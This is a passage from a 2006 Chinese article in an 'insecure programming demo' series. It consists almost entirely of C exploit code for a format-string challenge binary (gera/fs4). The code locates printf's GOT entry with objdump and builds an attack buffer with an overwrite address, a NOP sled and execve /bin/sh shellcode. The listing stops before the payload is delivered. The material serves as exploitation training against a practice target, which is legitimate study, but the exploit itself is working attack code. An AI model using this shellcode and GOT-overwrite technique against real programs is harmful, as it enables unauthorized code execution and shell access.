非安全编程演示之格式化字符串(2)
2006-04-02 20:26:42 来源:WEB开发网
#define OBJDUMP "/usr/bin/objdump"
#define VICTIM "/home/user/gera/fs4"
#define GREP "/bin/grep"
/* 24 bytes shellcode */
/*
 * Raw machine-code bytes stored as a NUL-terminated C string literal.
 * sizeof(shellcode) is 25 (includes the implicit terminator); main()
 * below measures it with strlen(), which yields 24, so the two lengths
 * must not be used interchangeably.
 */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
int main(void) {
char evil_buffer[49151 + 1], temp_buffer[64];
char *p;
int printf_address;
FILE *f;
sprintf(temp_buffer, "%s -R %s | %s printf", OBJDUMP, VICTIM,
GREP);
f = popen(temp_buffer, "r");
if( fscanf(f, "%x", &printf_address) != 1) {
pclose(f);
printf("Error: Cannot find printf() address in GOT!\n");
exit(1);
}
printf("printf() address in GOT is: 0x%x\n", printf_address);
/* Evil buffer */
p = evil_buffer;
/* Some junk here */
memset(p, 'B', 8);
p += 8;
*((void **)p) = (void *) (printf_address + 2);
p += 4;
/* Adding NOPs. 12 = 8(for junk) + 4(for address) */
memset(p, '\x90', (sizeof(evil_buffer) - strlen(shellcode) - 12 -
1));
p += (sizeof(evil_buffer) - strlen(shellcode) - 12 - 1);
/* Adding shellcode */
memcpy(p, shellcode, strlen(shellcode));
p += strlen(shellcode);
*p = '\0';